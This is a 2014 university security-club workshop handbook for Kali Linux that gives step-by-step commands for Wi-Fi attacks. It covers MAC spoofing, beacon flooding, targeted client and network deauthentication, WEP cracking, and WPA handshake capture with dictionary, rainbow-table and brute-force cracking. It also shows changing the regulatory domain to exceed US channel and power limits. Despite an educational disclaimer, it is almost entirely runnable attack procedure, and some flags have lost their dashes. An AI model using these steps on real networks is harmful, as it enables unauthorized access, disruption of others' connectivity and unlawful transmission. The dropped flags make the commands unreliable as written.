Missouri University of Science and Technology

ACM SIG-Security 2014 Wi-Fi Workshop

Exploitation Handbook

1
2
 The information provided in this manual is to be used for educational purposes
only. The authors are in no way responsible for any misuse of the information
provided. All of the information in this manual is meant to help the reader
develop a Wi-Fi hacker defense attitude in order to prevent the attacks discussed.
In no way should you use the information to cause any kind of damage directly or
indirectly. Any hacking discussed in this manual should be regarded as Ethical
hacking. You implement the information given at your own risk.

By reading these tutorials given in this manual, you agree that this tutorial is
intended for educational purposes only and the author cannot be held liable for
any kind of damages done whatsoever to your machine, or damages caused by
some other, creative application of this tutorial. In any case you disagree with the
above statement, stop here.

*Note-All images, programs, and steps in this manual were tested and performed
with 32-bit Kali Linux version 1.0.6 live iso downloaded from http://www.kali.org
installed to a USB flash drive with YUMI-Multiboot USB Creator available from
http://www.pendrivelinux.com and an Alfa AWUSO36H USB wireless adapter on
a laptop computer with an internal wireless card and an internal Ethernet card.

Any statement starting with a # character is meant to be run in the terminal.

Each section of this manual is starting as if you just freshly booted into Kali. You
may not need to do the first steps in a section if you have already done work since
booting your computer. Two examples of this would be opening the terminal and
starting monitor mode on wlan1 so that you now have a mon0 interface.

When text appears in quotes that means not to type it verbatim, but rather
substitute something for the text in the quotes. For Example password means to
type what you want the password to be.

3
4
 Table of Contents
Terms and Definitions..7

Getting to know Kali Linux9

Initial Computer Setup.10

Tools Used in this manual..11

Finding the correct Wireless adapter.13

Finding your MAC address............14

Specifically changing your MAC address..15

Randomly changing your MAC address17

Changing your MAC address back the factory address.19

Changing the channel of your wireless card.20

Operating Wi-Fi outside US regulation frequencies...............................................21

Operating your wireless card with more power .................................................23

Finding the modes your wireless card supports.25

Operating your card in ad-hoc mode.26

Operating your card in monitor mode..28

Data gathering in monitor mode..29

Beacon Flooding31

Viewing Probe Requests..33

Passive Network Scan35

Active Network Scan..37

5
Directed Client Deauthentication 38

Directed Network Deauthentication..40

Multiple Network Deauthentication..42

Forced connection to a specific access point44

Breaking WEP Encryption46

Breaking WPA Encryption with a dictionary list.50

Breaking WPA Encryption with a rainbow table.54

Computing personalized Rainbow Tables58

Breaking WPA Encryption by brute force60

Charts and Figures64

6
 Terms and Definitions
Access Point(AP)- a device that allows wireless devices to connect to a
wired network using Wi-Fi
Bandwidth-The difference between the upper and lower frequencies in a
continuous set of frequencies.
Channel-A pre-defined number assigned to a specific center frequency and
bandwidth within the frequency range that Wi-Fi operates within. Within
the US, channels 1-11 are available for use at higher powers.
Evil Twin- A rogue Wi-Fi access point that appears to be a legitimate one
offered on the premises, but actually has been set up to eavesdrop on
wireless communications.
Frequency- A rate of oscillation which corresponds to radio waves and the
alternating currents which carry radio signals.
Honeypot-A wireless access point intentionally set up to allow people to
connect to it for reasons of monitoring traffic or other malicious reasons.
IEEE 802.11- A set of media access control and physical layer specifications
for implementing wireless local area network computer communication in
the 2.4GHz, 3.6GHz, 5GHz, 60 GHz, and tv white space frequency bands.
IP Address- A numerical label assigned to each device participating in a
computer network that uses the Internet Protocol for communication.
ISM Band- Radio bands reserved internationally for the use of radio
frequency energy for industrial, scientific and medical purposes other than
telecommunications. Despite the intent of the original allocations, and
because there are multiple allocations, in recent years the fastest-growing
uses of these bands have been for short-range, low power communications
systems.
MAC Address- A unique identifier assigned to network interfaces for
communications on the physical network segment.
Modes-Different ways that the wireless card can function. These modes
include master, managed, ad-hoc, mesh, repeater, and monitor. Master
mode is used by wireless access points. Managed mode is used by clients to

7
 connect to a wireless network. Ad-hoc is used for creating a network
directly between clients. Mesh mode is used in commercial applications to
create ad-hoc networks between access points. Repeater mode is used to
boost the range of a wireless access point. Monitor mode is used when
wishing to view traffic that was not meant for your computer.
NIC-Short for network interface card. A computer hardware component
that connects a computer to a computer network.
Packet- A formatted unit of data carried by a packet-switched network. A
packet consists of two kinds of data: control information and user data
(also known as payload). The control information provides data the
network needs to deliver the user data, for example: source and
destination network addresses, error detection codes, and sequencing
information. Typically, control information is found in packet headers and
trailers, with payload data in between.
Rainbow Table- A pre-computed table for reversing cryptographic hash
functions, usually for cracking password hashes. Tables are usually used in
recovering a plaintext password up to a certain length consisting of a
limited set of characters.
WEP- Wired Equivalent Privacy. An easily broken security algorithm for IEEE
802.11 wireless networks introduced in 1999.
Wi-Fi-The trademarked name from the Wi-Fi Alliance for a popular
technology that allows the wireless transfer of data based upon the IEEE
802.11 standard.
WPA- Wi-Fi Protected Access. A security protocol and security certification
program developed by the Wi-Fi alliance to secure wireless networks. WPA
was designed to take the place of WEP.
WPA2- Wi-Fi Protected Access II. A security protocol and security
certification program developed by the Wi-Fi alliance to secure wireless
networks. WPA2 was designed to take the place of WPA.

8
 Getting to know Kali Linux
Kali Linux is a Debian-derived Linux distribution designed for digital
forensics and penetration testing. It is maintained and funded by Offensive
Security Ltd. Mati Aharoni and Devon Kearns of Offensive Security
developed it by rewriting BackTrack, their previous forensics Linux
distribution. In addition to Kali Linux, Offensive Security also maintains the
Exploit Database and the free online course, Metasploit Unleashed.
Kali Linux is preinstalled with numerous penetration-testing programs,
including nmap (a port scanner), Wireshark (a packet analyzer), John the
Ripper (a password cracker), and Aircrack-ng (a software suite for
penetration-testing wireless LANs). Users may run Kali Linux from a hard
disk, live CD, or live USB. It is a supported platform of the Metasploit
Projects Metasploit Framework, a tool for developing and executing
security exploits.
Kali Linux is distributed in 32- and 64-bit images for use on hosts based on
the x86 instruction set, as well as an image for the ARM architecture for use
on the Raspberry Pi computer and on Samsungs ARM Chromebook.

9
 Initial Computer Setup
1. With the computer off plug in the USB flash drive with kali linux
installed as well as the USB alfa wireless card.
2. Turn on the computer and boot off of the USB. The will vary upon
computer manufacturer, but there will a button to press before your
computer boots off of the internal hard drive.
3. You should be brought to the YUMI multiboot USB start page. Using
the arrow keys select System Tools -> and hit enter.
4. You should be brought into the Systems Tools page of YUMI. Using
the arrow keys select kali-linux-1.0.6-i386 and hit enter.
5. You should be brought to the Kali Linux Boot menu. Using the arrow
keys select Live (686-pae) and hit enter. Your computer is now
booting off of the USB drive in a live mode. This means that nothing
is being written to the hard drive and in fact you could do this
without a hard drive even installed.
6. You should now be booted into kali linux and sitting at the desktop. It
is to be noted that by default, kali runs in a single user environment
meaning that you are the root(admin). If kali is left alone for a set
amount of time it will lock the screen and the password for the root
account is toor.
7. In order to enable the wireless cards, you must turn off airplane
mode which is enabled by default. Click ApplicationsSystems
ToolsPreferencesSystem Settings. From the System settings
select Network and then click on the Airplane Mode toggle switch to
make sure it is off.
8. Your computer is now ready to proceed through this manual.

10
 Tools used in this manual
aircrack-ng
o http://www.aircrack-ng.org
o A network software suite consisting of a detector,
packet sniffer, WEP and WPA/WPA2-PSK cracker and
analysis tool for 802.11 wireless networks
aireplay-ng
o http://www.aircrack-ng.org/doku.php?id=aireplay-ng
o Used to inject frames and generate traffic for later use in
aircrack-ng for cracking WEP and WPA-PSK keys.
airmon-ng
o http://www.aircrack-ng.org/doku.php?id=airmon-ng
o This script can be used to enable monitor mode on
wireless interfaces. It may also be used to go back from
monitor mode to managed mode.
airodump-ng
o http://www.aircrack-ng.org/doku.php?id=airodump-ng
o Is used for packet capturing of raw 802.11 frames and is
particularly suitable for collecting WEP Ivs (Initialization
Vector) for the intent of using them with aircrack-ng.
Jasager-karma
o http://www.digininja.org/jasager/
o KARMA enabled access points passively listen to any
client wireless requests and then responds to it with the
SSID that the client probed for and thus impersonating
virtually any Access Point.
Kali Linux
o http://www.kali.org/
o A Debian-derived Linux distribution designed for digital
forensics and penetration testing.
mdk3
o http://homepages.tu-darmstadt.de/~p_larbig/wlan/

11
 o A program that uses the osdep injection library from the
aircrack-ng project. Used for packet injection as well as
numerous other Wi-Fi related attacks such as a wireless
DDOS(directed denial of service) attack.
tshark
o http://www.wireshark.org/
o An open-source packet analyzer used for network
troubleshooting, analysis, software and communication
protocol development, and education.

12
 Finding the correct wireless adapter
1. Open the terminal

2. type #airmon-ng and

hit enter

3. The interface with the realtek RTL8187L is the interface that you want to
use. In this case that interface is wlan1 because there is already an internal
wireless card which is wlan0. Your situation may be different and substitute
the correct interface on your own computer when wlan1 is used in this
manual.

13
 Finding your MAC address
1. Open the terminal

2. Type #ifconfig wlan1

14
 Specifically changing your MAC address
1. Open the terminal

2. Type #ifconfig wlan1 down

3. Type one of the following

#ifconfig wlan1 hw ether de:ad:be:ef:c0:fe

#macchanger m de:ad:be:ef:c0:fe wlan1

15
 4. Type # ifconfig wlan1 up

5. Type #ifconfig wlan1

****Notice that the MAC address is now different than if you were to run
this command when the computer if first booted.

16
 Randomly Changing your MAC Address
1. Open the terminal

2. Type #ifconfig wlan1 down

3. Type one of the following

#ifconfig wlan1 hw ether 96:de:3a:c5:3a:74
#macchanger r wlan1

Specific Random

Computer Random

17
 4. Type #ifconfig wlan1 up

5. Type #ifconfig wlan1

****Notice that the MAC address is now different than if you were to run
this command when the computer if first booted.

18
Changing your MAC address back to factory original
1. Open the terminal

2. Type #ifconfig wlan1 down

3. Type #macchanger p wlan1

4. Type #ifconfig wlan1 up

5. Type #ifconfig wlan1

19
 Changing the Channel of your wireless card
1. Open the terminal

2. Type #iwconfig wlan1

3. Type #iwconfig wlan1 channel c

c is the channel you wish to set

4. Type #iwconfig wlan1

****Notice that a Frequency section has been added and will change depending
upon what channel you entered.

20
 Operating Wi-Fi outside US regulation frequencies
1. Open the terminal

2. Type #iw reg get

3. Type #iw reg set JP

4. Type #iw reg get

21
 5. Type #iwconfig wlan1 channel c
c is the channel you wish to use 1-14

6. Type #iwconfig wlan1

****Notice that the frequency corresponds to channel 14 which is normally

not available for use in the United States and is only used in Japan. This holds
true for channel 12 and 13 which are not used with higher power in the US.

22
 Operating your wireless card with more power
1. Open the terminal

2. Type #iwconfig wlan1

3. Type #iw reg set BO

4. Type #iwconfig wlan1 txpower 30

23
 5. Type #iwconfig wlan1

****Notice that the Tx-Power has changed from 20 dBm to 30dBm. This is
a change from .1 Watt to 1 Watt.

The FCC regulation on ERP(Effective Radiated Power) depends on the use of

the wireless link. A point to point wireless connection can have a greater
ERP than a point to multipoint wireless link.

24
 Finding the modes your wireless card supports
1. Open the terminal

2. Type #airmon-ng

3. Type #iw phy phy0 info | grep A3 modes

Notice that phy0 is the Realtek RTL8187L,
this may vary on your computer.

25
 Operating your wireless card in ad-hoc mode
Step 6 is optional as it enables WEP security.
1. Open the terminal

2. Type #ifconfig wlan1 down

3. Type #iwconfig wlan1 mode ad-hoc

4. Type #iwconfig wlan1 channel 1

5. Type #iwconfig wlan1 essid nameofnetwork

26
6. Type #iwconfig wlan1 key s:password
note that the password must work out
to be 10 or 26 hexadecimal numbers.
This is equivalent to 5 or 13 characters.

7. Type #ifconfig wlan1 up

8. Type #iwconfig wlan1

27
 Operating your card in monitor mode
1. Open the terminal

2. Type #airmon-ng start wlan1

3. Type #iwconfig

****Notice that a new

Interface has been

created, mon0.

28
 Data gathering in monitor mode
1. Open the terminal

2. Type #airmon-ng start wlan1

3. Type #tshark i mon0

29
 You should see something

similar to this

This is every packet being sent

across the given channel

4. Type ctrl-c to end

5. Type #airodump-ng mon0

You should see something

similar to this

The top section shows access

points while the bottom shows

client computers.

6. Type ctrl-c to end

30
 Beacon Flooding
Beacons are a type of 802.11 (Wi-Fi) management frames.
They are transmitted periodically by an access point to announce its
presence and contain all of the information about a network (name,
speeds, encryption type, etc).
We are able to send these packets even though a network does not exist.
1. Open the terminal

2. Type #airmon-ng start wlan1

3. Type #nano ssidlist

31
 4. Add different network names on new lines

5. Hit ctrl-x then y then enter when done entering network names

6. Type #mdk3 mon0 b -f ssidlist

7. Hit ctrl-c to quit when done sending beacons

****You can view

these networks

on a computer, but

you cannot connect

to them since they

are not real.

32
 Viewing Probe Requests
1. Open the terminal

2. Type #airmon-ng start wlan1

33
 3. Type #airodump-ng mon0

4. Type ctrl-c to stop

****Notice that this section of output is at the very bottom of the

screen. If many access points are within range, you might have to
zoom out while the program is running and then zoom back in after
stopping it. The text zoom option is available from the view menu at
the top of the screen.

34
 Passive Network Scan
1. Open the terminal

2. Type #airmon-ng start wlan1

35
 3. Type #iw dev wlan1 scan passive | grep SSID

36
 Active Network Scan
1. Open the terminal

2. Type #airmon-ng start wlan1

3. Type #iwlist wlan1 scan | grep ESSID

37
 Directed Client Deauthentication
1. Open the terminal

2. Type #airmon-ng start wlan1

38
3. Type #airodump-ng mon0

This is
when
a target
is chosen

The BSSID is the AP MAC and the STATION is the client MAC
The ESSID is the network name and the number under CH is the channel.
4. Type ctrl-c to quit
5. Type #iwconfig mon0 channel 11
11 is the channel of the AP from above

6. Type #aireplay-ng ignore-negative-one -0 10 -a AP MAC -c Client MAC

mon0

39
 Directed Network Deauthentication
1. Open the terminal

2. Type #airmon-ng start wlan1

3. Type #airodump-ng mon0

Choose your

target network

4. Type ctrl-c when finished

40
5. Type #nano blacklist

put the target networks

MAC address on separate

lines

6. Type crtl-x, Y, enter

7. Type #mdk3 mon0 d -b blacklist -c 11

11 is the channel of the access point

8. Type ctrl-c to stop

41
 Multiple Network Deauthentication
1. Open the terminal

2. Type #airmon-ng start wlan1

3. Type #airodump-ng mon0

choose your

target networks

4. Type crtl-c when finished

42
 5. Type #nano blacklist

Put the target networks

MAC addresses on separate

lines

6. Type ctrl-x, Y, enter

7. Type #mdk3 mon0 d -b blacklist -c 6,11

6 and 11 are the channels of access points

8. Type ctrl-c to stop

43
 Forced connection to a specific access point
1. Open the terminal

2. Type #airmon-ng start wlan1

3. Type #airodump-ng mon0

This is the AP

that will be

accessible

4. Type ctrl-c when finished finding the AP info

44
5. Type #nano whitelist

6. Type ctrl-x, Y, enter when finished

7. Type #mdk3 mon0 d w whitelist

8. Type ctrl-c to stop

45
 Breaking WEP Encryption
1. Open the terminal

2. Type #airmon-ng start wlan1

3. Type #airodump-ng mon0

4. Type ctrl-c when a network has been found

46
5. Type #airodump-ng c 6 w acm_wep --bssid 12:18:0A:21:AE:E4 mon0

6. Open a new tab in terminal(filenew tab)

7. Type #aireplay-ng --ignore-negative-one -1 0 a 12:18:0A:21:AE:E4 h

00:C0:CA:75:6F:AB mon0

8. Type #aireplay-ng --ignore-negative-one -3 b 12:18:0A:21:AE:E4 h

00:C0:CA:75:6F:AB mon0

47
 9. Go back to the first tab and wait until the number in the #Data column
reaches 40000. Note that this is not a set number due to the statistical
analysis that goes into breaking the key and can vary greatly depending
upon the length of the key and several other factors. In this case it worked
with ~55000.

10.Open a new tab in terminal(filenew tab)

11.Type #aircrack-ng b 12:18:0A:21:AE:E4 acm_wep-01.cap

12.If not successful try again after the #Data column reaches the suggested
number

48
13.When successful you will see the a message similar to below

14.Go to each of the other tabs and type ctrl-c to stop the running program.

49
Breaking WPA Encryption with a dictionary list
1. Open the terminal

2. Type #airmon-ng start wlan1

3. Kill the two processes that could cause trouble with the command #kill pid

pid is the PID from the airmon-ng program output above

50
4. Type #airodump-ng mon0

5. Type ctrl-c when finished finding the target

6. Type #airodump-ng -c 11--bssid 00:1A:C4:51:3C:31 --w acm_dictionary
mon0

7. Open a new tab in terminal(filenew tab)

51
 8. Type #iwconfig mon0 channel 11

9. Type #aireplay-ng --ignore-negative-one -0 10 -a AP MAC -c client mac

mon0

10.Go back to the first tab and wait until WPA handshake : appears in the
upper right. Then type ctrl-c to stop the collection of data

This handshake is necessary to perform the password crack

11.Make sure your dictionary file in the same directory as your .cap file

52
12.Type #aircrack-ng acm_dictionary-01.cap w english.txt

53
 Breaking WPA Encryption with a Rainbow Table
1. Open the terminal

2. Type #airmon-ng start wlan1

3. Kill the two processes that could cause trouble with the command #kill pid

pid is the PID from the airmon-ng program output above

54
4. Type #airodump-ng mon0

5. Type ctrl-c when finished finding the target

6. Type #airodump-ng -c 11--bssid 00:1A:C4:51:3C:31 --w acm_dictionary
mon0

7. Open a new tab in terminal(filenew tab)

55
 8. Type #iwconfig mon0 channel 11

9. Type #aireplay-ng --ignore-negative-one -0 10 -a AP MAC -c client mac

mon0

10.Go back to the first tab and wait until WPA handshake : appears in the
upper right. Then type ctrl-c to stop the collection of data

This handshake is necessary to perform the password crack

11.Make sure your rainbow table file in the same directory as your .cap file

56
12.Type #cowpatty -r acm_dictionary-01.cap d acm_dictionary_hash s
acm_dictionary

57
 Computing personalized Rainbow Tables
1. Open the terminal

2. Type #airmon-ng start wlan1

3. Type #airodump-ng mon0

58
4. Type ctrl-c when finished finding the target
5. Make sure your dictionary file is in your current file directory
6. Type #genpmk -f English.txt -d acm_dictionary_hash -s acm_dictionary

7. When the program finishes running the rainbow table will be saved in the
current directory

59
 Breaking WPA Encryption by brute force
1. Open the terminal

2. Type #airmon-ng start wlan1

3. Kill the two processes that could cause trouble with the command #kill pid
pid is the PID from the airmon-ng program output above

60
4. Type #airodump-ng mon0

5. Type ctrl-c when finished finding the target

6. Type #airodump-ng -c 11--bssid 00:1A:C4:51:3C:31 --w acm_dictionary
mon0

7. Open a new tab in terminal(filenew tab)

61
 8. Type #iwconfig mon0 channel 11

9. Type #aireplay-ng --ignore-negative-one -0 10 -a AP MAC -c client mac

mon0

10.Go back to the first tab and wait until WPA handshake : appears in the
upper right. Then type ctrl-c to stop the collection of data

This handshake is necessary to perform the password crack

62
Type #john -stdout -incremental:all | aircrack-ng -b 00:1a:c4:51:3c:31 -w
acm_dictionary-01.cap

11.Now you wait until the program has cracked the password. The given
method will eventually break every password but would take an extremely
long time. There are optimizations that could be made, for example if the
length of the key was known. In making this manual, I did not wait until
completion because of time constraints.

63
 Charts and Figures
Wi-Fi channels in the 2.4Ghz band and 5Ghz Band

802.11 Standards

64